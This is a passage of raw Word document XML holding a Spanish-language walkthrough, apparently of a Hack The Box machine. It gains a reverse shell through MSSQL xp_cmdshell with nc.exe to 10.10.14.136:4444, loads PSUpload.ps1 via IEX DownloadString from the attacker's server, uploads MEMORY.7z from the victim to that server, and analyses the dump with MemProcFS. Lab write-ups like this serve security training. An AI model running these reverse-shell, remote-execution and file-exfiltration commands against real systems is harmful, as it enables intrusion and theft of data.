          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%TEMP%</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) con el nombre </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> EXEC xp_cmdshell '%TEMP%\nc.exe 10.10.14.136 4444 -e powershell' =</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> El segundo comando ejecuta el archivo descargado (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) y establece una conexión reversa a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.14.136</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el puerto </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, pasando el control a una sesión de PowerShell.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3048000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="41" name="image39.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image39.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="57312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Y con esto obtenemos una reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5495925" cy="1695450"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="38" name="image34.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image34.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5495925" cy="169545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Vulnerabilidad:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>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hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.mssqltips.com/sqlservertip/1020/enabling-xpcmdshell-in-sql-server/</w:t>
        </w:r>
      </w:hyperlink>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Encontramos un archivo INI donde este nos proporciona una nueva contraseña </w:t>
      </w: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Realizamos la instalación de uploadserver con el comando python3 -m pip install uploadserver</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y procedemos a correr el servidor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4924425" cy="504825"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3" name="image20.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image20.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4924425" cy="504825"/>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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:jc w:val="cente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Por otro lado, descargamos nuestro PSUpload.ps1</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hyperlink r:id="rId21">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1</w:t>
        </w:r>
      </w:hyperlink>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4914900" cy="1666875"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="39" name="image41.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image41.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4914900" cy="1666875"/>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En nuestra maquina victima corremos el comando</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IEX(New-Object Net.WebClient).DownloadString('</w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://10.10.14.136:8001/PSUpload.ps1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:jc w:val="cente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este comando es para cargar el PSUpload.ps1. Pasamos nuestra dirección ip y nuestro puerto del servidor http.server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="279400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="27" name="image19.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image19.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="2794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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="812800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="28" name="image26.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image26.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="8128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después de haber cargando nuestro PSUpload podemos realizar la descarga del archivo MEMORY.7z con el comando:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Invoke-FileUpload -File C:\users\mikasaAckerman\desktop\MEMORY.7z -Uri </w:t>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://10.10.14.136:8000/upload</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. en este pasamos nuestra dirección ip y el puerto de nuestra uploadserver</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4895850" cy="523875"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="14" name="image18.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image18.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4895850" cy="523875"/>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="292100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="35" name="image22.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image22.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="2921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Esto tomará un tiempo pero nos descargara el archivo MEMORY.7z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5210175" cy="657225"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="40" name="image38.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image38.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5210175" cy="657225"/>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="482600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6" name="image6.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image6.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="4826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Analisis de archivo MEMORY.DMP </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¿Qué es un archivo de MEMORY.DMP?</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El archivo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MEMORY.DMP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> es un archivo de volcado de memoria (memory dump) generado por el sistema operativo Windows cuando ocurre un fallo crítico, como un "pantallazo azul de la muerte" (BSOD). Este archivo captura el contenido de la memoria RAM en el momento del fallo, lo que permite a los administradores del sistema y a los desarrolladores analizar el estado del sistema y diagnosticar la causa del problema.</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Para analizar este archivo y hacer un volcado de memoria utilizaremos la herramienta MemProcFS</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¿Que es MemProcFS?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MemProcFS (Memory Process File System) es una herramienta diseñada para analizar la memoria de un sistema en tiempo real o desde una imagen de memoria. Proporciona una forma de montar la memoria del sistema como un sistema de archivos, lo que facilita la exploración y análisis de los datos de memoria utilizando comandos de sistema de archivos estándar.</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Asi que procedemos a instalar la herramienta desde la pagina</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId31">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/ufrisk/MemProcFS/releases</w:t>
        </w:r>
      </w:hyperlink>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Descargamos el archivo correspondiente al sistema operativo, en este caso utilizamos linux </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="4127500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="29" name="image32.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image32.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="573120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Después de descargar el comprimido pasamos a extraer la carpeta con el programa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1308100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="36" name="image31.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image31.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="13081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Esta es una herramienta muy facil y utilizar </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Procedemos a agregar esta carpeta en la misma directorio donde tenemos nuestro archivo DMP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2133600" cy="476250"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="34" name="image30.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image30.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2133600" cy="47625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Ahora navegamos hasta el directorio donde se encuentra el archivo MemProcFS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1003300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="26" name="image37.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image37.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="100330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Si corremos solo este programa nos dará las instrucciones de como podemos analizar el archivo DMP</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./memprocfs   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="5537200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="32" name="image29.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image29.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="553720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Asi que procedemos a correr la herramienta con el archivo DMP</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./memprocfs  -mount /home/jordy/Escritorio/freelancer/ -device ../MEMORY.DMP   -forensic 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2336800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="12" name="image24.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image24.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="57312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Pusimos a correr nuestra herramienta donde nos generaba un error, nos informaba que el mountpoint no estaba vacio por lo que procedimos a crear un nuevo directorio para poder que funcionara</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="1247775" cy="1276350"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="25" name="image16.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image16.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
